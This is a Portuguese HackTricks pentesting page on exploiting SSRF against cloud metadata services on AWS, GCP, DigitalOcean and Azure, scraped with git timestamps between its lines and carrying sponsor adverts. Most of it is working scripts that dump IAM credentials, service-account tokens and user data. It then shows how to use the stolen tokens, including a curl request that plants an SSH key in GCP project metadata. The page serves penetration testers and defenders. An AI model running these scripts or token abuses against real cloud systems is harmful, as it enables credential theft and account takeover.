hacktricks/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md

578 lines
33 KiB
Markdown
Raw Normal View History

# Cloud SSRF
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encontre vulnerabilidades que são mais importantes para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha de tecnologia, desde APIs até aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
***
2022-05-02 18:53:13 +00:00
## AWS
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
### Abusando do SSRF no ambiente AWS EC2
2022-05-08 19:05:00 +00:00
**A metadados** pode ser acessada de dentro de qualquer máquina EC2 e oferece informações interessantes sobre ela. É acessível na url: `http://169.254.169.254` ([informações sobre os metadados aqui](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)).
2022-05-08 19:05:00 +00:00
Existem **2 versões** do metadados. A **primeira** permite **acessar** o metadados via solicitações **GET** (então qualquer **SSRF pode explorá-lo**). Para a **versão 2**, [IMDSv2](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html), você precisa solicitar um **token** enviando uma solicitação **PUT** com um **cabeçalho HTTP** e, em seguida, usar esse token para acessar os metadados com outro cabeçalho HTTP (então é **mais complicado de abusar** com um SSRF).
2022-06-02 13:49:01 +00:00
{% hint style="danger" %}
Observe que se a instância EC2 estiver aplicando IMDSv2, [**de acordo com a documentação**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), a **resposta da solicitação PUT** terá um **limite de salto de 1**, tornando impossível acessar os metadados EC2 de um contêiner dentro da instância EC2.
Além disso, **IMDSv2** também **bloqueará solicitações para buscar um token que inclua o cabeçalho `X-Forwarded-For`**. Isso é para evitar que proxies reversos mal configurados possam acessá-lo.
{% endhint %}
2022-05-08 19:06:42 +00:00
Você pode encontrar informações sobre os [metadados na documentação](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-categories.html). No script a seguir, algumas informações interessantes são obtidas a partir dele:
2022-05-08 19:05:00 +00:00
```bash
EC2_TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
HEADER="X-aws-ec2-metadata-token: $EC2_TOKEN"
URL="http://169.254.169.254/latest/meta-data"
aws_req=""
if [ "$(command -v curl)" ]; then
aws_req="curl -s -f -H '$HEADER'"
2022-05-08 19:05:00 +00:00
elif [ "$(command -v wget)" ]; then
aws_req="wget -q -O - -H '$HEADER'"
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
2022-05-08 19:05:00 +00:00
fi
2022-09-01 11:07:00 +00:00
printf "ami-id: "; eval $aws_req "$URL/ami-id"; echo ""
printf "instance-action: "; eval $aws_req "$URL/instance-action"; echo ""
printf "instance-id: "; eval $aws_req "$URL/instance-id"; echo ""
printf "instance-life-cycle: "; eval $aws_req "$URL/instance-life-cycle"; echo ""
printf "instance-type: "; eval $aws_req "$URL/instance-type"; echo ""
printf "region: "; eval $aws_req "$URL/placement/region"; echo ""
2022-05-08 19:05:00 +00:00
echo ""
2022-05-11 10:13:29 +00:00
echo "Account Info"
2022-09-01 11:07:00 +00:00
eval $aws_req "$URL/identity-credentials/ec2/info"; echo ""
eval $aws_req "http://169.254.169.254/latest/dynamic/instance-identity/document"; echo ""
2022-05-08 19:05:00 +00:00
echo ""
2022-05-11 10:13:29 +00:00
echo "Network Info"
for mac in $(eval $aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do
echo "Mac: $mac"
printf "Owner ID: "; eval $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo ""
printf "Public Hostname: "; eval $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo ""
printf "Security Groups: "; eval $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo ""
echo "Private IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo ""
printf "Subnet IPv4: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo ""
echo "PrivateIPv6s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo ""
printf "Subnet IPv6: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo ""
echo "Public IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo ""
echo ""
2022-05-08 19:05:00 +00:00
done
echo ""
2022-05-11 10:13:29 +00:00
echo "IAM Role"
2022-09-01 11:07:00 +00:00
eval $aws_req "$URL/iam/info"
for role in $(eval $aws_req "$URL/iam/security-credentials/" 2>/dev/null); do
echo "Role: $role"
eval $aws_req "$URL/iam/security-credentials/$role"; echo ""
echo ""
2022-05-08 19:05:00 +00:00
done
echo ""
2022-05-11 10:13:29 +00:00
echo "User Data"
2022-05-08 19:05:00 +00:00
# Search hardcoded credentials
2022-09-01 11:07:00 +00:00
eval $aws_req "http://169.254.169.254/latest/user-data"
2022-10-28 09:19:40 +00:00
echo ""
echo "EC2 Security Credentials"
eval $aws_req "$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo ""
2022-02-13 12:30:13 +00:00
```
Como exemplo de credenciais IAM **publicamente disponíveis**, você pode visitar: [http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws)
2022-02-13 12:30:13 +00:00
Você também pode verificar as **credenciais de segurança EC2 públicas** em: [http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance)
2022-10-28 09:19:40 +00:00
Em seguida, você pode **usar essas credenciais com o AWS CLI**. Isso permitirá que você faça **qualquer coisa que a função tenha permissão** para fazer.
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
Para aproveitar as novas credenciais, você precisará criar um novo perfil AWS como este:
2022-02-13 12:30:13 +00:00
```
[profilename]
aws_access_key_id = ASIA6GG7PSQG4TCGYYOU
aws_secret_access_key = a5kssI2I4H/atUZOwBr5Vpggd9CxiT5pUkyPJsjC
aws_session_token = AgoJb3JpZ2luX2VjEGcaCXVzLXdlc3QtMiJHMEUCIHgCnKJl8fwc+0iaa6n4FsgtWaIikf5mSSoMIWsUGMb1AiEAlOiY0zQ31XapsIjJwgEXhBIW3u/XOfZJTrvdNe4rbFwq2gMIYBAAGgw5NzU0MjYyNjIwMjkiDCvj4qbZSIiiBUtrIiq3A8IfXmTcebRDxJ9BGjNwLbOYDlbQYXBIegzliUez3P/fQxD3qDr+SNFg9w6WkgmDZtjei6YzOc/a9TWgIzCPQAWkn6BlXufS+zm4aVtcgvBKyu4F432AuT4Wuq7zrRc+42m3Z9InIM0BuJtzLkzzbBPfZAz81eSXumPdid6G/4v+o/VxI3OrayZVT2+fB34cKujEOnBwgEd6xUGUcFWb52+jlIbs8RzVIK/xHVoZvYpY6KlmLOakx/mOyz1tb0Z204NZPJ7rj9mHk+cX/G0BnYGIf8ZA2pyBdQyVbb1EzV0U+IPlI+nkIgYCrwTCXUOYbm66lj90frIYG0x2qI7HtaKKbRM5pcGkiYkUAUvA3LpUW6LVn365h0uIbYbVJqSAtjxUN9o0hbQD/W9Y6ZM0WoLSQhYt4jzZiWi00owZJjKHbBaQV6RFwn5mCD+OybS8Y1dn2lqqJgY2U78sONvhfewiohPNouW9IQ7nPln3G/dkucQARa/eM/AC1zxLu5nt7QY8R2x9FzmKYGLh6sBoNO1HXGzSQlDdQE17clcP+hrP/m49MW3nq/A7WHIczuzpn4zv3KICLPIw2uSc7QU6tAEln14bV0oHtHxqC6LBnfhx8yaD9C71j8XbDrfXOEwdOy2hdK0M/AJ3CVe/mtxf96Z6UpqVLPrsLrb1TYTEWCH7yleN0i9koRQDRnjntvRuLmH2ERWLtJFgRU2MWqDNCf2QHWn+j9tYNKQVVwHs3i8paEPyB45MLdFKJg6Ir+Xzl2ojb6qLGirjw8gPufeCM19VbpeLPliYeKsrkrnXWO0o9aImv8cvIzQ8aS1ihqOtkedkAsw=
```
Observe o **aws\_session\_token**, isso é indispensável para o perfil funcionar.
2022-02-13 12:30:13 +00:00
[**PACU**](https://github.com/RhinoSecurityLabs/pacu) pode ser usado com as credenciais descobertas para descobrir seus privilégios e tentar elevar privilégios.
2022-02-13 12:30:13 +00:00
### SSRF em credenciais do AWS ECS (Serviço de Contêineres)
2022-02-13 12:30:13 +00:00
**ECS**, é um grupo lógico de instâncias EC2 em que você pode executar um aplicativo sem precisar dimensionar sua própria infraestrutura de gerenciamento de cluster, pois o ECS gerencia isso para você. Se você conseguir comprometer o serviço em execução no **ECS**, os **endpoints de metadados mudam**.
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
Se você acessar _**http://169.254.170.2/v2/credentials/\<GUID>**_, encontrará as credenciais da máquina ECS. Mas primeiro você precisa **encontrar o \<GUID>**. Para encontrar o \<GUID>, você precisa ler a variável **environ** **AWS\_CONTAINER\_CREDENTIALS\_RELATIVE\_URI** dentro da máquina.\
Você pode ser capaz de lê-lo explorando uma **travessia de caminho** para `file:///proc/self/environ`\
2023-06-06 18:56:34 +00:00
O endereço http mencionado deve fornecer a **AccessKey, SecretKey e token**.
2022-02-13 12:30:13 +00:00
```bash
2022-06-02 12:02:53 +00:00
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null || wget "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" -O -
2022-02-13 12:30:13 +00:00
```
2022-06-01 15:39:15 +00:00
{% hint style="info" %}
Observe que, em **alguns casos**, você poderá acessar a **instância de metadados do EC2** a partir do contêiner (verifique as limitações de TTL do IMDSv2 mencionadas anteriormente). Nesses cenários, a partir do contêiner, você pode acessar tanto a função IAM do contêiner quanto a função IAM do EC2.
2022-06-01 15:39:15 +00:00
{% endhint %}
2023-06-06 18:56:34 +00:00
### SSRF para AWS Lambda <a href="#6f97" id="6f97"></a>
2022-05-11 11:17:22 +00:00
Nesse caso, as **credenciais são armazenadas em variáveis de ambiente**. Portanto, para acessá-las, você precisa acessar algo como **`file:///proc/self/environ`**.
2022-07-27 16:08:17 +00:00
Os **nomes** das **variáveis de ambiente interessantes** são:
2022-07-27 16:08:17 +00:00
* `AWS_SESSION_TOKEN`
* `AWS_SECRET_ACCESS_KEY`
* `AWS_ACCES_KEY_ID`
Além disso, além das credenciais IAM, as funções Lambda também possuem **dados de evento que são passados para a função quando ela é iniciada**. Esses dados estão disponíveis para a função por meio da [interface de tempo de execução](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html) e podem conter **informações sensíveis** (como dentro das **stageVariables**). Ao contrário das credenciais IAM, esses dados são acessíveis por SSRF padrão em **`http://localhost:9001/2018-06-01/runtime/invocation/next`**.
2022-05-11 11:17:22 +00:00
2022-06-02 16:20:19 +00:00
{% hint style="warning" %}
Observe que as **credenciais da lambda** estão dentro das **variáveis de ambiente**. Portanto, se o **rastreamento de pilha** do código da lambda imprimir as variáveis de ambiente, é possível **extradi-las provocando um erro** no aplicativo.
2022-06-02 16:20:19 +00:00
{% endhint %}
### SSRF URL para AWS Elastic Beanstalk <a href="#6f97" id="6f97"></a>
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
Recuperamos o `accountId` e `region` da API.
2022-02-13 12:30:13 +00:00
```
http://169.254.169.254/latest/dynamic/instance-identity/document
http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
```
2023-06-06 18:56:34 +00:00
Em seguida, recuperamos o `AccessKeyId`, `SecretAccessKey` e `Token` da API.
2022-02-13 12:30:13 +00:00
```
http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
```
![](https://miro.medium.com/max/60/0\*4OG-tRUNhpBK96cL?q=20) ![](https://miro.medium.com/max/1469/0\*4OG-tRUNhpBK96cL)
2023-06-06 18:56:34 +00:00
Em seguida, usamos as credenciais com `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.
2022-02-13 12:30:13 +00:00
2022-05-02 18:53:13 +00:00
## GCP <a href="#6440" id="6440"></a>
Você pode [**encontrar aqui a documentação sobre os pontos de extremidade de metadados**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata).
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
### URL SSRF para o Google Cloud <a href="#6440" id="6440"></a>
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
Requer o cabeçalho "Metadata-Flavor: Google" ou "X-Google-Metadata-Request: True" e você pode acessar o ponto de extremidade de metadados com as seguintes URLs:
2022-02-13 12:30:13 +00:00
2022-02-16 09:28:48 +00:00
* http://169.254.169.254
* http://metadata.google.internal
* http://metadata
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
Pontos de extremidade interessantes para extrair informações:
2022-02-16 09:28:48 +00:00
```bash
# /project
2022-05-01 12:41:36 +00:00
# Project name and number
2022-02-16 09:28:48 +00:00
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/project-id
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/project/numeric-project-id
2022-05-01 12:41:36 +00:00
# Project attributes
2022-02-16 09:28:48 +00:00
curl -H "X-Google-Metadata-Request: True" http://metadata/computeMetadata/v1/project/attributes/?recursive=true
# /oslogin
2022-05-01 12:41:36 +00:00
# users
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/oslogin/users
2022-05-01 12:41:36 +00:00
# groups
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/oslogin/groups
2022-05-01 12:41:36 +00:00
# security-keys
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/oslogin/security-keys
2022-05-01 12:41:36 +00:00
# authorize
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/oslogin/authorize
2022-02-16 09:28:48 +00:00
# /instance
2022-05-01 12:41:36 +00:00
# Description
2022-02-16 09:28:48 +00:00
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/description
2022-05-01 12:41:36 +00:00
# Hostname
2022-02-16 09:28:48 +00:00
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/hostname
2022-05-01 12:41:36 +00:00
# ID
2022-02-16 09:28:48 +00:00
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/id
2022-05-01 12:41:36 +00:00
# Image
2022-02-16 09:28:48 +00:00
curl -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/image
2022-05-01 12:41:36 +00:00
# Machine Type
2023-02-20 18:01:10 +00:00
curl -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/machine-type
2022-05-01 12:41:36 +00:00
# Name
2023-02-20 18:01:10 +00:00
curl -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/name
2022-05-01 12:41:36 +00:00
# Tags
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/scheduling/tags
2022-05-01 12:41:36 +00:00
# Zone
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/zone
2023-01-24 14:43:15 +00:00
# User data
curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/attributes/startup-script"
2022-05-01 12:41:36 +00:00
# Network Interfaces
for iface in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/"); do
echo " IP: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/ip")
echo " Subnetmask: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
echo " Gateway: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
echo " DNS: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers")
echo " Network: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/network")
echo " ============== "
2022-02-16 09:28:48 +00:00
done
2022-05-01 12:41:36 +00:00
# Service Accounts
for sa in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/"); do
echo " Name: $sa"
echo " Email: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}email")
echo " Aliases: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}aliases")
echo " Identity: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}identity")
echo " Scopes: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}scopes")
echo " Token: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}token")
echo " ============== "
2022-02-16 09:28:48 +00:00
done
2022-05-01 12:41:36 +00:00
# K8s Attributtes
## Cluster location
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/cluster-location
2022-05-01 12:41:36 +00:00
## Cluster name
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/cluster-name
2022-05-01 12:41:36 +00:00
## Os-login enabled
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/enable-oslogin
2022-05-01 12:41:36 +00:00
## Kube-env
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/kube-env
2022-05-01 12:41:36 +00:00
## Kube-labels
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/kube-labels
2022-05-01 12:41:36 +00:00
## Kubeconfig
2023-02-20 18:01:10 +00:00
curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/instance/attributes/kubeconfig
2023-02-19 18:39:32 +00:00
# All custom project attributes
curl "http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true&alt=text" \
-H "Metadata-Flavor: Google"
2023-02-19 18:39:32 +00:00
# All custom project attributes instance attributes
curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true&alt=text" \
-H "Metadata-Flavor: Google"
2022-02-13 12:30:13 +00:00
```
Beta não requer um cabeçalho no momento (obrigado Mathias Karlsson @avlidienbrunn)
2022-02-13 12:30:13 +00:00
```
http://metadata.google.internal/computeMetadata/v1beta1/
http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
```
2023-01-20 15:45:29 +00:00
{% hint style="danger" %}
Para **usar o token da conta de serviço exfiltrada**, você pode simplesmente fazer o seguinte:
2023-01-20 15:45:29 +00:00
```bash
# Via env vars
export CLOUDSDK_AUTH_ACCESS_TOKEN=<token>
2023-01-25 11:53:16 +00:00
gcloud projects list
2023-01-20 15:45:29 +00:00
# Via setup
echo "<token>" > /some/path/to/token
gcloud config set auth/access_token_file /some/path/to/token
2023-01-25 11:53:16 +00:00
gcloud projects list
2023-01-22 18:27:01 +00:00
gcloud config unset auth/access_token_file
2023-01-20 15:45:29 +00:00
```
{% endhint %}
2023-06-06 18:56:34 +00:00
### Adicionar uma chave SSH <a href="#3e24" id="3e24"></a>
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
Extrair o token
2022-02-13 12:30:13 +00:00
```
http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json
```
2023-06-06 18:56:34 +00:00
Verifique o escopo do token
2022-02-13 12:30:13 +00:00
```
$ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=ya29.XXXXXKuXXXXXXXkGT0rJSA {
"issued_to": "101302079XXXXX",
"audience": "10130207XXXXX",
"scope": "https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/devstorage.read_write https://www.googleapis.com/auth/monitoring",
"expires_in": 2443,
"access_type": "offline"
2022-02-13 12:30:13 +00:00
}
```
2023-06-06 18:56:34 +00:00
Agora envie a chave SSH.
2022-02-13 12:30:13 +00:00
{% code overflow="wrap" %}
2023-01-20 15:45:29 +00:00
```bash
curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCommonInstanceMetadata"
-H "Authorization: Bearer ya29.c.EmKeBq9XI09_1HK1XXXXXXXXT0rJSA"
-H "Content-Type: application/json"
2022-02-13 12:30:13 +00:00
--data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}'
```
{% endcode %}
2022-02-13 12:30:13 +00:00
2022-05-02 18:53:13 +00:00
## Digital Ocean <a href="#9f1f" id="9f1f"></a>
2022-02-13 12:30:13 +00:00
2022-12-13 22:52:41 +00:00
{% hint style="warning" %}
Não existem coisas como Funções AWS ou conta de serviço GCP, portanto, não espere encontrar credenciais de bot de metadados
2022-12-13 22:52:41 +00:00
{% endhint %}
2023-06-06 18:56:34 +00:00
Documentação disponível em [`https://developers.digitalocean.com/documentation/metadata/`](https://developers.digitalocean.com/documentation/metadata/)
2022-02-13 12:30:13 +00:00
```
curl http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1.json
http://169.254.169.254/metadata/v1/
2022-02-13 12:30:13 +00:00
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/user-data
http://169.254.169.254/metadata/v1/hostname
http://169.254.169.254/metadata/v1/region
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one request:
curl http://169.254.169.254/metadata/v1.json | jq
```
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encontre vulnerabilidades que são mais importantes para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha de tecnologia, desde APIs até aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
***
2022-05-02 18:53:13 +00:00
## Azure <a href="#cea8" id="cea8"></a>
2022-02-13 12:30:13 +00:00
2022-09-25 18:26:29 +00:00
### Azure VM
2022-02-13 12:30:13 +00:00
[**Documentação** aqui](https://learn.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=linux).
2022-02-13 12:30:13 +00:00
2023-06-06 18:56:34 +00:00
* **Deve** conter o cabeçalho `Metadata: true`
* Não deve conter um cabeçalho `X-Forwarded-For`
2022-02-13 12:30:13 +00:00
{% tabs %}
{% tab title="Bash" %}
{% code overflow="wrap" %}
```bash
HEADER="Metadata:true"
URL="http://169.254.169.254/metadata"
API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions
echo "Instance details"
curl -s -f -H "$HEADER" "$URL/instance?api-version=$API_VERSION"
echo "Load Balancer details"
curl -s -f -H "$HEADER" "$URL/loadbalancer?api-version=$API_VERSION"
echo "Management Token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://management.azure.com/"
echo "Graph token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://graph.microsoft.com/"
echo "Vault token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://vault.azure.net/"
echo "Storage token"
curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://storage.azure.com/"
```
{% endcode %}
{% endtab %}
{% tab title="PS" %}
```bash
2022-09-25 18:26:29 +00:00
# Powershell
Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -NoProxy -Uri "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | ConvertTo-Json -Depth 64
2022-10-30 18:21:55 +00:00
## User data
$userData = Invoke- RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "http://169.254.169.254/metadata/instance/compute/userData?api-version=2021- 01-01&format=text"
[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($userData))
2022-09-25 22:19:09 +00:00
# Paths
/metadata/instance?api-version=2017-04-02
/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
/metadata/instance/compute/userData?api-version=2021-01-01&format=text
2022-02-13 12:30:13 +00:00
```
{% endtab %}
{% endtabs %}
2022-09-29 13:18:42 +00:00
### Azure App Service
2022-09-25 14:14:17 +00:00
2023-06-06 18:56:34 +00:00
A partir do **env** você pode obter os valores de `IDENTITY_HEADER` _e_ `IDENTITY_ENDPOINT`. Isso pode ser usado para obter um token para se comunicar com o servidor de metadados.
2022-09-25 14:14:17 +00:00
2023-06-06 18:56:34 +00:00
Na maioria das vezes, você deseja um token para um desses recursos:
2022-10-26 12:49:19 +00:00
* [https://storage.azure.com](https://storage.azure.com/)
* [https://vault.azure.net](https://vault.azure.net/)
* [https://graph.microsoft.com](https://graph.microsoft.com/)
* [https://management.azure.com](https://management.azure.com/)
2022-09-25 14:14:17 +00:00
```bash
# Check for those env vars to know if you are in an Azure app
echo $IDENTITY_HEADER
echo $IDENTITY_ENDPOINT
# You should also be able to find the folder:
ls /opt/microsoft
#and the file
ls /opt/microsoft/msodbcsql17
2022-09-25 14:51:27 +00:00
# Get management token
2022-09-25 14:14:17 +00:00
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
2022-09-25 14:51:27 +00:00
# Get graph token
curl "$IDENTITY_ENDPOINT?resource=https://graph.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
2022-09-25 14:14:17 +00:00
# API
# Get Subscriptions
URL="https://management.azure.com/subscriptions?api-version=2020-01-01"
curl -H "Authorization: $TOKEN" "$URL"
# Get current permission on resources in the subscription
URL="https://management.azure.com/subscriptions/<subscription-uid>/resources?api-version=2020-10-01'"
curl -H "Authorization: $TOKEN" "$URL"
# Get permissions in a VM
URL="https://management.azure.com/subscriptions/<subscription-uid>/resourceGroups/Engineering/providers/Microsoft.Compute/virtualMachines/<VM-name>/providers/Microsoft.Authorization/permissions?api-version=2015-07-01"
curl -H "Authorization: $TOKEN" "$URL"
```
```powershell
2022-09-25 14:51:27 +00:00
# API request in powershell to management endpoint
2022-09-25 14:14:17 +00:00
$Token = 'eyJ0eX..'
$URI='https://management.azure.com/subscriptions?api-version=2020-01-01'
2022-09-25 14:51:27 +00:00
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
2022-09-25 14:51:27 +00:00
}
(Invoke-RestMethod @RequestParams).value
